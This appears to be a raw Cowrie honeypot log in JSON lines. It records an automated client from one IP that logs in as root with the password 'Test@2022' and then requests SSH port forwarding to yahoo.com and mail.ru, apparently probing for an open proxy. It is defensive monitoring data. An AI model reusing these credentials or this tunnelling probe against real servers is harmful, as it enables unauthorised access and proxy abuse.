{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":17975,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:17975","sensor":"my-vps","timestamp":"2025-08-31T03:52:54.128605Z","session":"5ffea7656283"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:54.179012Z","src_ip":"77.83.207.83","session":"5ffea7656283"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:54.229860Z","src_ip":"77.83.207.83","session":"5ffea7656283"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37125,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6546396d95f","protocol":"ssh","message":"New connection: 77.83.207.83:37125 (1.2.3.4:22) [session: e6546396d95f]","sensor":"my-vps","timestamp":"2025-08-31T03:52:54.278124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:54.279100Z","src_ip":"77.83.207.83","session":"e6546396d95f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:54.328967Z","src_ip":"77.83.207.83","session":"e6546396d95f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:54.577574Z","src_ip":"77.83.207.83","session":"e6546396d95f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":25973,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:25973","sensor":"my-vps","timestamp":"2025-08-31T03:52:54.628770Z","session":"e6546396d95f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:54.678572Z","src_ip":"77.83.207.83","session":"e6546396d95f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22977,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:22977","sensor":"my-vps","timestamp":"2025-08-31T03:52:54.820187Z","session":"e6546396d95f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:54.869966Z","src_ip":"77.83.207.83","session":"e6546396d95f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":26882,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:26882","sensor":"my-vps","timestamp":"2025-08-31T03:52:55.012143Z","session":"e6546396d95f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:55.062036Z","src_ip":"77.83.207.83","session":"e6546396d95f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:55.113125Z","src_ip":"77.83.207.83","session":"e6546396d95f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37239,"dst_ip":"1.2.3.4","dst_port":22,"session":"bda18d564193","protocol":"ssh","message":"New connection: 77.83.207.83:37239 (1.2.3.4:22) [session: bda18d564193]","sensor":"my-vps","timestamp":"2025-08-31T03:52:55.161793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:55.162446Z","src_ip":"77.83.207.83","session":"bda18d564193"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:55.213259Z","src_ip":"77.83.207.83","session":"bda18d564193"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:55.459849Z","src_ip":"77.83.207.83","session":"bda18d564193"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":6154,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:6154","sensor":"my-vps","timestamp":"2025-08-31T03:52:55.510477Z","session":"bda18d564193"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:55.560164Z","src_ip":"77.83.207.83","session":"bda18d564193"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16276,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:16276","sensor":"my-vps","timestamp":"2025-08-31T03:52:55.700117Z","session":"bda18d564193"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:55.749861Z","src_ip":"77.83.207.83","session":"bda18d564193"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":13854,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:13854","sensor":"my-vps","timestamp":"2025-08-31T03:52:55.892029Z","session":"bda18d564193"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:55.941786Z","src_ip":"77.83.207.83","session":"bda18d564193"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:55.992225Z","src_ip":"77.83.207.83","session":"bda18d564193"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37352,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1caafdd2c8d","protocol":"ssh","message":"New connection: 77.83.207.83:37352 (1.2.3.4:22) [session: c1caafdd2c8d]","sensor":"my-vps","timestamp":"2025-08-31T03:52:56.042007Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:56.042888Z","src_ip":"77.83.207.83","session":"c1caafdd2c8d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:56.093179Z","src_ip":"77.83.207.83","session":"c1caafdd2c8d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:56.342694Z","src_ip":"77.83.207.83","session":"c1caafdd2c8d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7603,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:7603","sensor":"my-vps","timestamp":"2025-08-31T03:52:56.393538Z","session":"c1caafdd2c8d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:56.443919Z","src_ip":"77.83.207.83","session":"c1caafdd2c8d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":7389,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:7389","sensor":"my-vps","timestamp":"2025-08-31T03:52:56.584306Z","session":"c1caafdd2c8d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:56.634419Z","src_ip":"77.83.207.83","session":"c1caafdd2c8d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":17499,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:17499","sensor":"my-vps","timestamp":"2025-08-31T03:52:56.776350Z","session":"c1caafdd2c8d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:56.826505Z","src_ip":"77.83.207.83","session":"c1caafdd2c8d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:56.877200Z","src_ip":"77.83.207.83","session":"c1caafdd2c8d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37471,"dst_ip":"1.2.3.4","dst_port":22,"session":"04014957ad16","protocol":"ssh","message":"New connection: 77.83.207.83:37471 (1.2.3.4:22) [session: 04014957ad16]","sensor":"my-vps","timestamp":"2025-08-31T03:52:56.926255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:56.927194Z","src_ip":"77.83.207.83","session":"04014957ad16"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:56.977352Z","src_ip":"77.83.207.83","session":"04014957ad16"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:57.226310Z","src_ip":"77.83.207.83","session":"04014957ad16"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":12111,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:12111","sensor":"my-vps","timestamp":"2025-08-31T03:52:57.277231Z","session":"04014957ad16"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:57.327303Z","src_ip":"77.83.207.83","session":"04014957ad16"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":6646,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:6646","sensor":"my-vps","timestamp":"2025-08-31T03:52:57.468352Z","session":"04014957ad16"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:57.518262Z","src_ip":"77.83.207.83","session":"04014957ad16"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":19255,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:19255","sensor":"my-vps","timestamp":"2025-08-31T03:52:57.660255Z","session":"04014957ad16"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:57.710556Z","src_ip":"77.83.207.83","session":"04014957ad16"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:57.762690Z","src_ip":"77.83.207.83","session":"04014957ad16"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37592,"dst_ip":"1.2.3.4","dst_port":22,"session":"29fa5df6934a","protocol":"ssh","message":"New connection: 77.83.207.83:37592 (1.2.3.4:22) [session: 29fa5df6934a]","sensor":"my-vps","timestamp":"2025-08-31T03:52:57.812597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:57.823129Z","src_ip":"77.83.207.83","session":"29fa5df6934a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:57.863462Z","src_ip":"77.83.207.83","session":"29fa5df6934a"}
{"eventid":"cowrie.session.closed","duration":12.747585773468018,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:58.087547Z","src_ip":"212.227.235.229","session":"c9fc07a429ed"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:58.115002Z","src_ip":"77.83.207.83","session":"29fa5df6934a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":20359,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:20359","sensor":"my-vps","timestamp":"2025-08-31T03:52:58.166812Z","session":"29fa5df6934a"}
